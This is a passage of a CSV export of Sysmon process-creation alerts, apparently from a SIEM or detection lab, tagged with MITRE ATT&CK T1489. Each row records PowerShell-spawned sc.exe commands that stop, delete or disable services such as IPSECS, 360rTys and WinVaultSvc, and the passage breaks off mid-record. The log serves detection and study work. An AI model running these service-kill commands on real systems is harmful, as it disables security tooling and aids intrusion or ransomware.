""C:\Windows\system32\sc.exe"" Config IPSECS Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config IPSECS Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.191748900Z"",""eventRecordID"":""2960"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.186\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-0010d2632600}\r\nProcessId: 7628\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config IPSECS Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.186"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-0010d2632600}"",""processId"":""7628"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config IPSECS Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.838",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.149 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-0010c7612600} +ProcessId: 3572 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop 360rTys +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.152172600Z"",""eventRecordID"":""2958"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.149\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-0010c7612600}\r\nProcessId: 3572\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.149"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-0010c7612600}"",""processId"":""3572"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop 360rTys"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.698",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.078 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-0010105f2600} +ProcessId: 6192 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfyxxx +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.080789400Z"",""eventRecordID"":""2955"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.078\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-0010105f2600}\r\nProcessId: 6192\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.078"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-0010105f2600}"",""processId"":""6192"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfyxxx"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.531",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.036 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-00104d5b2600} +ProcessId: 7744 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Xtfya +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Xtfya",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.040378500Z"",""eventRecordID"":""2953"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.036\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-00104d5b2600}\r\nProcessId: 7744\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Xtfya\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.036"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-00104d5b2600}"",""processId"":""7744"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Xtfya"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.432",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.022 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-001019592600} +ProcessId: 7684 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfya +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.025516800Z"",""eventRecordID"":""2952"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.022\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-001019592600}\r\nProcessId: 7684\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.022"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-001019592600}"",""processId"":""7684"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfya"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.388",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.972 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010e7532600} +ProcessId: 1520 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfy +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.975163300Z"",""eventRecordID"":""2949"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.972\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010e7532600}\r\nProcessId: 1520\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.972"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-0010e7532600}"",""processId"":""1520"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfy"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.344",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.928 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-00108a502600} +ProcessId: 6724 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinVaultSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 